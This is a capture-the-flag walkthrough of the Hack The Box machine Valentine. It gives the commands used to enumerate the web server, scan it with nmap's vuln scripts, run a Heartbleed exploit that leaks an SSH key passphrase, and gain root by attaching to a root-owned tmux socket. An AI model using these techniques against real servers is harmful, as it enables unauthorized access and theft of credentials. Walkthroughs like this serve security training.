I’ve put Valentine’s IP in /etc/hosts:

10.10.10.79 valentine.htb

Running Nmap:

HTTP Enumeration

Running gobuster lists these directories:

/icons/ (Status: 403)
/doc/ (Status: 403)
/cgi-bin/ (Status: 403)
/index/ (Status: 200)
/index.php (Status: 200)
/dev/ (Status: 200)
/encode/ (Status: 200)
/encode.php (Status: 200)
/decode/ (Status: 200)
/decode.php (Status: 200)
/server-status/ (Status: 403)

In /dev there’s a notes.txt:

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

We might have to somehow exploit the encoding-decoding directories.

There’s also a file called hype_key:

This seems to be an SSH private key. Trying it with SSH and user hype (as it was the file name):

SSH

It asks for a passphrase and we don’t have it yet, so let’s keep searching.

Looking at the nmap results there’s an HTTPS page. At this point we can try checking vulnerabities with Nmap:

nmap --script vuln valentine.htb

And it returns:

| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.

| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.

| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.

Nmap done: 1 IP address (1 host up) scanned in 61.40 seconds

Nmap results tells us HTTPS is not vulnerable to just one or two attacks, but three!

Especially and the most important: Heartbleed. It’s a vulnerability that can be used to read system memory to get passwords or some other information, and even eavesdrop on communications.

HeartBleed Explanation

Credits to xkcd.com for the Heartbleed Explanation

Exploiting Heartbleed

We can get the Heartbleed exploit from this gist.

And just by running:

python heartbleed.py 10.10.10.79

It throws:

##################################################################
Connecting to: 10.10.10.79:443, 1 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0

WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!

The text aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== is encoded in base64, decoded is heartbleedbelievethehype.

This seems to be the password for the SSH Private Key, so let’s verify it:

SSH Session

We are in!!

Privilege Escalation via Tmux session

Running linpeas.sh shows a rare command running (much like would do pspy):

Tmux Session

Here Root seems to be serving the Tmux session (-S parameter) via a Socket, to attach to it we just have to:

tmux -S /.devs/dev_sess

And rooted!
